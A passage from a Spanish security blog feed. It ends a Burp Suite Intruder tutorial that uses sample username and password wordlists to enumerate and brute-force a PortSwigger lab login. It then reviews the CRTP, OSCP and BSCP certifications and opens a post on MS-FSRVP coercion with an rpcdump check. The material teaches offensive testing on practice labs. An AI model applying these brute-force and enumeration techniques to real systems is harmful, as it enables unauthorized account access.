Condensed;">Cluster bomb nos permite elegir múltiples conjuntos de payloads: uno por posición, sin embargo, mientras que Pitchfork itera a través de cada conjunto de payloads simultáneamente, Cluster bomb itera a través de cada conjunto de payloads individualmente, asegurándose de que se prueben todas las combinaciones posibles de payloads.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ejemplo: si tenemos una petición que tiene 2 parámetros username y password y tenemos dos listas de palabras que sería la primera lista de nombres: </span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">admin </span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">root</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Administrator</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y la segunda lista de contraseñas:</span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">P@ssw0rd</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">toor</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">123456</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las solicitudes serian así:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzwTjuqEQgxbOj2x72ezfEsfBXkCqrhbJ-fNCcfSZlch1mjx2qRamB4Qe1ATribJO5OSu545FaXrpxiWg3hjAwXplRKHkggkLSt9ogbt2UUPQUtgk2WzuKcr9e-kWNrNwVXKG7H8hbrvW8-KCUuksVmslWJePp2bbTHnA0HfjURhX5B9jlOVXpjFfvuoT/s1005/2024-03-12%2015_23_53-Post_Flu_Intruder%20-%20Word.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="378" data-original-width="1005" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzwTjuqEQgxbOj2x72ezfEsfBXkCqrhbJ-fNCcfSZlch1mjx2qRamB4Qe1ATribJO5OSu545FaXrpxiWg3hjAwXplRKHkggkLSt9ogbt2UUPQUtgk2WzuKcr9e-kWNrNwVXKG7H8hbrvW8-KCUuksVmslWJePp2bbTHnA0HfjURhX5B9jlOVXpjFfvuoT/w640-h240/2024-03-12%2015_23_53-Post_Flu_Intruder%20-%20Word.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez conocidos los tipos de ataques disponibles seguimos con el ejemplo práctico. En nuestro caso concreto elegiremos el de tipo Sniper ya que conseguiremos el usuario y contraseña por separado. A continuación, añadiremos la posición del payload en el campo “username”</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-W7i1TdQX_f-yBfB_QhOo9oovGQr96JaMMdspYMZiXzM5B6LXAv6krBhxbrGG5DEAIJ76gTspjmp3WhCgF35HFv3ZqueYq4mP-BxsbnzbqrHQrI8OtnyGYJGZgVXG6KDtki2u7ZHlTaT8PSx1atKbycQhAvTzwdeJiyJSZjIxyr57nE8fnpjPm0DIUo2V/s1104/posicionPayloads.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="828" data-original-width="1104" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-W7i1TdQX_f-yBfB_QhOo9oovGQr96JaMMdspYMZiXzM5B6LXAv6krBhxbrGG5DEAIJ76gTspjmp3WhCgF35HFv3ZqueYq4mP-BxsbnzbqrHQrI8OtnyGYJGZgVXG6KDtki2u7ZHlTaT8PSx1atKbycQhAvTzwdeJiyJSZjIxyr57nE8fnpjPm0DIUo2V/w640-h480/posicionPayloads.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez seleccionada la posición vamos a añadir el payload que usaremos en el ataque. En este caso hemos usado una lista de nombre comunes a modo de diccionario. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigquVkTSzNzhDac-O5ivh3naqGmWQIVkQpYE4VFyoX9hYpNn5blbRtlI8oKzYNZ-MjTcR7EdJuB4M8Eb6r0GYfEil75SNtLZSMWULzNAjVT3jIxvcjJtRfgm4VDq0WpfJCPISlHcIdn620dgNZ-36pkKms3CsHm9UFbGf0S_PwyCLpmOEhN3rH7PLcpKOP/s721/cargarPayloads.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="633" data-original-width="721" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigquVkTSzNzhDac-O5ivh3naqGmWQIVkQpYE4VFyoX9hYpNn5blbRtlI8oKzYNZ-MjTcR7EdJuB4M8Eb6r0GYfEil75SNtLZSMWULzNAjVT3jIxvcjJtRfgm4VDq0WpfJCPISlHcIdn620dgNZ-36pkKms3CsHm9UFbGf0S_PwyCLpmOEhN3rH7PLcpKOP/w640-h562/cargarPayloads.png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con todo listo podemos iniciar el ataque, que hará peticiones a la web con todos los nombres de usuarios proporcionados.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwiYZcnCZydpf4xo8AnDJhp59BWMQ6Rgd_pmjl5dn7G8GI8E_9BRTUTSiaNz05BukhevLhc6E7BoCW_e0RJv1PiyRW3hD-j91e2J90yklq-d4ysoClBOxMk5XNPc8OesO-j22v3lYtWfpSVT8CQZ4BVgqkSaJG-c3q1uwhoD5TJzIngHy6hp9i-0j_A69/s709/deteccionUsuario.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="465" data-original-width="709" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwiYZcnCZydpf4xo8AnDJhp59BWMQ6Rgd_pmjl5dn7G8GI8E_9BRTUTSiaNz05BukhevLhc6E7BoCW_e0RJv1PiyRW3hD-j91e2J90yklq-d4ysoClBOxMk5XNPc8OesO-j22v3lYtWfpSVT8CQZ4BVgqkSaJG-c3q1uwhoD5TJzIngHy6hp9i-0j_A69/w640-h420/deteccionUsuario.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Podemos observar como con el payload alerts el tamaño de la respuesta cambia, esto es debido a que el mensaje de error es distinto, donde nos dice que la contraseña es incorrecta. De aquí obtenemos que existe un usuario llamado alerts.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ahora usaremos el mismo método, pero en el campo password para encontrar la contraseña del usuario identificado</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgyAKIYrICOaL4uCXsqqh-yKbunEzC7Mh4GqD3vR4dcWPmwcoums-U3sfvOjzbcejsUCo8aPd-Q_VBuDfkhiYkJJnrWB2xepQP00h0otea5oeMi3GcpTmm3T4Z8M6V_kdKbl3SxxBGVXjBhQblqX6WZxIebgXlmrjyTnL0o1LZj27TLRmgaB17jL97tgI/s1901/cambioPayload.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="803" data-original-width="1901" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgyAKIYrICOaL4uCXsqqh-yKbunEzC7Mh4GqD3vR4dcWPmwcoums-U3sfvOjzbcejsUCo8aPd-Q_VBuDfkhiYkJJnrWB2xepQP00h0otea5oeMi3GcpTmm3T4Z8M6V_kdKbl3SxxBGVXjBhQblqX6WZxIebgXlmrjyTnL0o1LZj27TLRmgaB17jL97tgI/w640-h270/cambioPayload.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez cambiado el usuario con el que se intenta iniciar sesión repetimos el mismo ataque con la contraseña cambiando la lista a una con valores típicos de contraseñas débiles.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ygmfgJAuq4tuqU52XK9je09IDFtrTAAB0rVWpcx2F40eyc7zu35kMqVUoj_FmJQ3h0LRL37I8j0jH0ynoqScZv6qYqCZzAORRFm6rgi-hykNz0cDSnrBgW7fZEc75poKoV2Cu2vfwQOT4fcvO6hUkc7WVS4_CYtqaDfLSKAM2E0RIsN8gOA3MbjexSm3/s1468/encontrarPassword.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="767" data-original-width="1468" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ygmfgJAuq4tuqU52XK9je09IDFtrTAAB0rVWpcx2F40eyc7zu35kMqVUoj_FmJQ3h0LRL37I8j0jH0ynoqScZv6qYqCZzAORRFm6rgi-hykNz0cDSnrBgW7fZEc75poKoV2Cu2vfwQOT4fcvO6hUkc7WVS4_CYtqaDfLSKAM2E0RIsN8gOA3MbjexSm3/w640-h334/encontrarPassword.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En este caso podemos detectar el cambio en la respuesta ya que se trata de una redirección, que nos indica que posiblemente se ha validado.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Probamos a ver si estamos en lo correcto en la página de prueba:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDWrq0MgiseqjiImcjLn471CV0XAfxBZgcZFbYk_CXsMDQkMhaf5KFlh8mbwtCx4dC-XzdIlWCycojg4hddHc7iVTZkwRdW7QOfER2D-ylWgqobfOQ4VTlhAFDF59TCsGZXESUas3DtrkjBjARRUGIl-Cilpz5Yrm67v3x6JWPZJ3lFmDe7aC7d5HKcDw/s1292/AcessoConcedido.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="582" data-original-width="1292" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQDWrq0MgiseqjiImcjLn471CV0XAfxBZgcZFbYk_CXsMDQkMhaf5KFlh8mbwtCx4dC-XzdIlWCycojg4hddHc7iVTZkwRdW7QOfER2D-ylWgqobfOQ4VTlhAFDF59TCsGZXESUas3DtrkjBjARRUGIl-Cilpz5Yrm67v3x6JWPZJ3lFmDe7aC7d5HKcDw/w640-h288/AcessoConcedido.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y con las credenciales obtenidas podemos entrar quedando además resuelto el laboratorio.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">De igual manera que he realizado esta prueba con un laboratorio de portswinger hay multitud de páginas y máquinas que pueden servir para practicar con el Intruder. Algunas de ellas son:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">•<span style="white-space: pre;"> </span><a href="http://testphp.vulnweb.com/login.php ">http://testphp.vulnweb.com/login.php </a></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">•<span style="white-space: pre;"> </span><a href="https://pentesterlab.com/exercises">https://pentesterlab.com/exercises </a></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">•<span style="white-space: pre;"> </span><a href="https://github.com/digininja/DVWA">https://github.com/digininja/DVWA</a> </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hasta aquí esta introducción al intruder, como podéis suponer tiene multitud de usos y se puede aplicar de formas muy distintas según las necesidades de la auditoria. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esperamos que os haya gustado y os vemos en la próxima entrega de FluProject.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/%C3%A1lvaro-gonz%C3%A1lez-almansa-laredo-2b1a31234/">Álvaro González-Almansa</a>, <i>student intern</i> at <a href="http://www.zerolynx.com">Zerolynx</a></span></div><div><br /></div><br /></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-23790533454935318892024-02-26T15:01:00.003+01:002024-02-26T15:23:34.852+01:00Análisis de Certificaciones de Ciberseguridad Ofensiva | Parte II<p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7DVchG_3ZvWMxi1kjmVZj6E3gYaxplm-d9UQ5v31D-73HMGeA86wbLTQcPur_tgnyvRv9iQ473HrbyjePTALJjwBa4phJ3pT_29SljNq9ap3Ji9tZpG4G0q3ayhwaQ1P66KA0BkpB_k_F_wdpzXVbL6sB2OsA_6h3Erqgb6aSQro0LJnLT1wDaxsoiq3M/s1920/El%20texto%20del%20p%C3%A1rrafo%20(1).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7DVchG_3ZvWMxi1kjmVZj6E3gYaxplm-d9UQ5v31D-73HMGeA86wbLTQcPur_tgnyvRv9iQ473HrbyjePTALJjwBa4phJ3pT_29SljNq9ap3Ji9tZpG4G0q3ayhwaQ1P66KA0BkpB_k_F_wdpzXVbL6sB2OsA_6h3Erqgb6aSQro0LJnLT1wDaxsoiq3M/w640-h360/El%20texto%20del%20p%C3%A1rrafo%20(1).jpg" width="640" /></a></div><br /><p></p><p style="text-align: justify;">En la anterior entrega de Certificaciones de Ciberseguridad Ofensiva, estuvimos hablando sobre eJPT (Junior Penetration Tester) y eWPT (Web Penetration Tester). Durante la entrega de hoy os contaremos qué otras posibilidades existen respecto a las Certificaciones de Ciberseguridad Ofensiva:</p><h3 style="text-align: justify;">CRTP (Certified Red Team Professional)</h3><h4 style="text-align: justify;">Descripción</h4><p style="text-align: justify;">El CRTP (Certified Red Team Professional) de Altered Security es una certificación de Red Team en la que se evalúa la capacidad de una persona para comprometer entornos de Directorio Activo empresariales.</p><h4 style="text-align: justify;">Público objetivo</h4><p style="text-align: justify;">Esta certificación está diseñada para personas que buscan adquirir los conocimientos necesarios para llevar a cabo ejercicios de Red Team y auditorías internas de seguridad. Sin embargo, también es una excelente opción para aquellos que simplemente deseen ampliar sus conocimientos en comprometer entornos de Directorio Activo empresariales.</p><h4 style="text-align: justify;">Contenido</h4><p style="text-align: justify;"></p><ul><li>Enumeración de Directorio Activo: enumerar información útil como usuarios, grupos, pertenencia a grupos, equipos, propiedades de usuarios, confianzas, ACL, etc., para mapear rutas de ataque.</li></ul><ul><li>Escalada de privilegios local: escalar privilegios locales en máquinas Windows del dominio objetivo.</li></ul><ul><li>Escalada de privilegios de dominio: descubrir credenciales y sesiones de cuentas administradoras, aplicar técnicas clásicas como Kerberoast y sus variantes, identificar y explotar problemas de delegación, así como aprender a abusar de los privilegios de grupos protegidos.</li></ul><ul><li>Persistencia de dominio: explotar la funcionalidad de Kerberos para persistir con privilegios de administrador de dominio, falsificar tickets para llevar a cabo ataques como "Golden ticket" y "Silver ticket". Subvertir la autenticación a nivel de dominio con técnicas como "Skeleton key" y SSP personalizado.</li></ul><p></p><h4 style="text-align: justify;">Formato de examen</h4><p style="text-align: justify;">El CRTP es un examen de 24 horas que consiste en realizar una auditoría interna en un Directorio Activo desde una máquina Windows y con un usuario de dominio proporcionado. El objetivo del examen es lograr la ejecución de comandos en todas las máquinas, independientemente de si se poseen privilegios de administrador o no. En total, hay 5 máquinas, excluyendo la propia del examinado. Tras realizar la parte práctica, se dispone de 48 horas para enviar el informe.</p><h4 style="text-align: justify;">Precio</h4><p style="text-align: justify;">Para poder realizar el examen, es necesario adquirir el curso de Altered Security, que ofrece tres opciones diferentes. La opción más asequible tiene un precio de 249$ e incluye 30 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.</p><p style="text-align: justify;">La segunda opción tiene un precio de 379$ e incluye 60 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.</p><p style="text-align: justify;">La tercera opción tiene un precio de 499$ e incluye 90 días de laboratorio, acceso de por vida al material del curso y un intento de examen.</p><p style="text-align: justify;">Existe la posibilidad de adquirir un intento de examen adicional por 99$. Si se desea extender el acceso al laboratorio por 30 días, además de obtener otro intento de examen, es posible hacerlo por 199$.</p><p style="text-align: justify;"><br /></p><h3 style="text-align: justify;">OSCP (Offensive Security Certified Professional)</h3><h4 style="text-align: justify;">Descripción</h4><p style="text-align: justify;">El OSCP (Offensive Security Certified Professional) es una de las certificaciones más reconocidas en el mundo de la seguridad ofensiva. Es una certificación totalmente práctica con la que se aprenden metodologías de pentesting y el uso de herramientas que vienen incluidas en la distribución Kali Linux.</p><h4 style="text-align: justify;">Público objetivo</h4><p style="text-align: justify;">Esta certificación no está diseñada para personas que están dando sus primeros pasos en el pentesting, a diferencia de otras como el eJPT. Está dirigida a personas que poseen un conocimiento técnico un poco más avanzado, ya sea a través de experiencia profesional o de haber dedicado tiempo a resolver desafíos en plataformas como TryHackMe o HackTheBox.</p><h4 style="text-align: justify;">Contenido</h4><p style="text-align: justify;"></p><ul><li>Metodologías de pentesting: comprensión de la metodología de hacking ético y pentesting, incluyendo reconocimiento, enumeración, explotación, post-explotación e informes.</li></ul><ul><li>Fundamentos de Linux: conocimiento del sistema operativo Linux, interfaz de línea de comandos y sistema de ficheros.</li></ul><ul><li>Conceptos de Redes: comprensión de protocolos y conceptos de redes, incluyendo TCP/IP, enrutamiento y firewalls.</li></ul><ul><li>Seguridad de Aplicaciones Web: conocimiento de vulnerabilidades en aplicaciones web, incluyendo SQL injection, cross-site scripting (XSS) e inyección de comandos.</li></ul><ul><li>Seguridad de Windows: conocimiento de la seguridad del sistema operativo Windows, incluyendo cuentas de usuario, permisos de ficheros y Directorio Activo.</li></ul><ul><li>Desarrollo de Exploits: conocimiento de técnicas de desarrollo de exploits, incluyendo ingeniería inversa, lenguaje ensamblador y debugging.</li></ul><ul><li>Seguridad Wireless: comprensión de conceptos y vulnerabilidades en redes wireless.</li></ul><ul><li>Criptografía: comprensión de conceptos y técnicas criptográficas, incluyendo cifrado, descifrado y hashing.</li></ul><p></p><h4 style="text-align: justify;">Formato de examen</h4><p style="text-align: justify;">El examen se divide en dos partes: la fase de explotación y la elaboración del informe, cada una con una duración de 24 horas. La evaluación total consta de 100 puntos, siendo necesario obtener al menos 70 para aprobar. Los 100 puntos se dividen de la siguiente manera:</p><p style="text-align: justify;"></p><ul><li>60 puntos: 3 máquinas independientes, cada una con una puntuación de 20 puntos. Estos 20 puntos se dividen en 10 por conseguir acceso a la máquina y otros 10 por escalar privilegios y convertirse en administrador/root.</li></ul><ul><li>40 puntos: entorno de directorio activo con 2 clientes y un controlador de dominio. Solamente se obtienen los puntos si se compromete el directorio activo al completo, sin posibilidad de obtener puntos parciales. Esto quiere decir que se obtienen 40 puntos o ninguno.</li></ul><p></p><p style="text-align: justify;">Además, aparte de los puntos que se obtengan en el examen, existe la posibilidad de obtener hasta 10 puntos adicionales si se completa lo siguiente:</p><p style="text-align: justify;"></p><ul><li>30 máquinas del laboratorio de preparación.</li></ul><ul><li>80% de los ejercicios de cada categoría.</li></ul><p></p><h4 style="text-align: justify;">Precio</h4><p style="text-align: justify;">Para poder realizar el examen, es necesario adquirir el curso PEN-200 (PWK) de Offensive Security. La opción más barata tiene un precio de 1649$ e incluye 90 días de acceso al laboratorio y un intento de examen.</p><p style="text-align: justify;">La suscripción Learn One tiene un precio de 2599$ al año y proporciona acceso al laboratorio por un año, así como dos intentos de examen. </p><p style="text-align: justify;">La suscripción Learn Unlimited tiene un precio de 5499$ al año e incluye todos los cursos de la biblioteca de entrenamiento de OffSec, además de intentos de examen ilimitados.</p><p style="text-align: justify;"><br /></p><h3 style="text-align: justify;">BSCP (Burp Suite Certified Practitioner)</h3><h4 style="text-align: justify;">Descripción</h4><p style="text-align: justify;">El BSCP (Burp Suite Certified Practitioner) es una certificación creada por los desarrolladores de Burp Suite, que es la herramienta por excelencia del pentesting web. Obtener esta certificación demuestra un conocimiento profundo de vulnerabilidades de aplicaciones web, la mentalidad correcta para explotarlas y, por supuesto, las habilidades necesarias con Burp Suite para llevar a cabo estas acciones.</p><h4 style="text-align: justify;">Público objetivo</h4><p style="text-align: justify;">Esta certificación tiene un nivel de dificultad alto y está diseñada para personas que quieran dedicarse a pentesting de aplicaciones web de manera profesional. No es necesario poseer anteriormente ninguna certificación de pentesting web para poder adquirir el BSCP, pero es recomendable tener unos conocimientos mínimos sobre el funcionamiento de las aplicaciones web.</p><h4 style="text-align: justify;">Contenido</h4><p style="text-align: justify;">El contenido de esta certificación son todos los módulos de la academia de PortSwigger:</p><p style="text-align: justify;"></p><ul><li>Vulnerabilidades del lado del servidor:</li></ul><ul><ul><li>Autenticación</li></ul></ul><ul><ul><li>Path traversal</li></ul></ul><ul><ul><li>Inyección de comandos</li></ul></ul><ul><ul><li>Vulnerabilidades de lógica de negocio</li></ul></ul><ul><ul><li>Revelación de información</li></ul></ul><ul><ul><li>Control de acceso</li></ul></ul><ul><ul><li>Vulnerabilidades de subida de ficheros</li></ul></ul><ul><ul><li>Condiciones de carrera</li></ul></ul><ul><ul><li>Server-side request forgery (SSRF)</li></ul></ul><ul><ul><li>Inyección XXE, SQL y NoSQL</li></ul></ul><ul><ul><li>Testeo de APIs</li></ul></ul><p></p><p style="text-align: justify;"><br /></p><p style="text-align: justify;"></p><ul><li>Vulnerabilidades del lado del cliente:</li></ul><ul><ul><li>Cross-site scripting (XSS)</li></ul></ul><ul><ul><li>Cross-site request forgery (CSRF)</li></ul></ul><ul><ul><li>Cross-origin resource sharing (CORS)</li></ul></ul><ul><ul><li>Clickjacking</li></ul></ul><ul><ul><li>Vulnerabilidades DOM-based</li></ul></ul><ul><ul><li>WebSockets</li></ul></ul><p></p><h4 style="text-align: justify;">Formato de examen</h4><p style="text-align: justify;">Se dispone de cuatro horas para vulnerar dos aplicaciones web, cada una compuesta por tres fases. En cada fase, se debe identificar una o más vulnerabilidades que deben ser explotadas para avanzar a la siguiente fase.</p><p style="text-align: justify;">En la fase 1, se comienza como un usuario no autenticado con el objetivo de escalar a un usuario de bajos privilegios. Después, en la fase 2, se debe escalar a un usuario administrador, y finalmente, en la fase 3, el objetivo es leer un archivo del sistema.</p><h4 style="text-align: justify;">Precio</h4><p style="text-align: justify;">Cada intento de examen tiene un coste de 89€. A diferencia de otras certificaciones, el BSCP no requiere comprar en conjunto el examen junto con un curso de formación, ya que la formación oficial es la academia de PortSwigger, la cual es gratuita.</p><p style="text-align: justify;">Hay que tener en cuenta que para poder realizar el examen es necesario utilizar Burp Suite Professional, que tiene un precio de 449€.</p><p style="text-align: justify;"><br /></p><div style="text-align: right;"><span style="font-family: "Barlow Semi Condensed";"><a href="https://www.linkedin.com/in/javier-martin-gimeno/" style="color: #2288bb; text-decoration-line: none;">Javier Martín</a>, <i>Analista de Ciberseguridad </i>en <a href="http://www.zerolynx.com/" style="color: #33aaff;">Zerolynx</a>.</span></div><div style="text-align: justify;"><br /></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-50680646001200641532024-02-19T09:00:00.011+01:002024-02-19T18:57:11.627+01:00Coerce | Parte II<p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0tXQoxUXCCfYrX7RBGvNw4ZIzrk6nTEcdnPhbjinN4bBJ6BAwsfP67VICSYc4uVun2qRCgbeNnLGRCKNZxDV0kRWJbpaGwipnk4VOlBICXzKSHA5C3RV73tzztIQ31gTG6W6PzFvBVQgfdLj4rBTQCdVAUirMoaOigvEouWX7IgUjkkfKNwc_Z4se_7YD/s1920/COERCE%20-%20Parte%20II.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0tXQoxUXCCfYrX7RBGvNw4ZIzrk6nTEcdnPhbjinN4bBJ6BAwsfP67VICSYc4uVun2qRCgbeNnLGRCKNZxDV0kRWJbpaGwipnk4VOlBICXzKSHA5C3RV73tzztIQ31gTG6W6PzFvBVQgfdLj4rBTQCdVAUirMoaOigvEouWX7IgUjkkfKNwc_Z4se_7YD/w640-h360/COERCE%20-%20Parte%20II.jpg" width="640" /></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡Hola de nuevo a todos! Tal y como prometimos, continuamos con la saga de Coerce y en esta segunda parte seguimos comentando sobre otros RPC vulnerables:</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">MS-FSRVP<span style="white-space: pre;"> </span></span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b">MS-FSRVP</a> Es el Remote Procedure Call relacionado con el protocolo de servidor de archivos remotos VSS. Se utiliza para crear copias de recursos compartidos de archivos en un ordenador remoto y para facilitar a las aplicaciones de copia de seguridad la realización de copias de seguridad coherentes con la aplicación y la restauración de datos en recursos compartidos SMB2.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que, para poder explotar esta vulnerabilidad, es necesario que el servidor tenga habilitado la característica “Servicio del agente VSS del servidor de archivos”. </span></p><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQe_yRPfGitQ9liJgrZfECIVN9-CdcivdVz4zQ_7M4olsKgsyPEwSfQRzkvYpIYBAgsDe3TF5Ef6DKTSzAGcWkYtsF0WIPdAMA85Y0aZ2N1kUYd6hsj92UGk-9Is9IRe9Hu9o2vYI1pgUK27f-tWawwEtrIr4kmND6-TSrtMAfCXLi4uWP6jKJKIv6Qp-/s833/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="713" data-original-width="833" height="548" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQe_yRPfGitQ9liJgrZfECIVN9-CdcivdVz4zQ_7M4olsKgsyPEwSfQRzkvYpIYBAgsDe3TF5Ef6DKTSzAGcWkYtsF0WIPdAMA85Y0aZ2N1kUYd6hsj92UGk-9Is9IRe9Hu9o2vYI1pgUK27f-tWawwEtrIr4kmND6-TSrtMAfCXLi4uWP6jKJKIv6Qp-/w640-h548/0.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que Microsoft saco dos parches de seguridad para su corrección el 14 de junio de 2022.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comprobación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al igual que en el caso de MS-RPRN, para comprobar utilizamos <a href="https://github.com/fortra/impacket/blob/master/examples/rpcdump.py">rpcdump </a>de <a href="https://github.com/fortra/impacket">impacket </a>si el RPC MS-FSRVP se encuentra habilitado:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a 